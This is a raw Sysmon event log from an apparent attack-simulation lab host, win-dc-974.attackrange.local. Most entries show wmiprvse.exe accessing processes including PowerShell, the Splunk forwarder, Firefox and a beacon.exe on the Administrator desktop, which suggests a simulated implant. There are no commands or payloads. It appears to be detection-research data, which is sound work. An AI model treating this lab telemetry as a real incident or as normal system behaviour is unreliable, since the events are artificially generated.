10341000x80000000000000002239616Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.357{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239615Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 17141700x80000000000000002239614Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:53:45.342{05ADC7E1-6D99-603E-A9AA-00000000AD01}6956\PSHost.132591776251942637.6956.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002239613Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239612Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239611Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239610Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239609Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239608Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239607Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239606Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239605Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239604Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239603Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239602Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239601Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239600Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239599Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239598Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239597Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239596Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\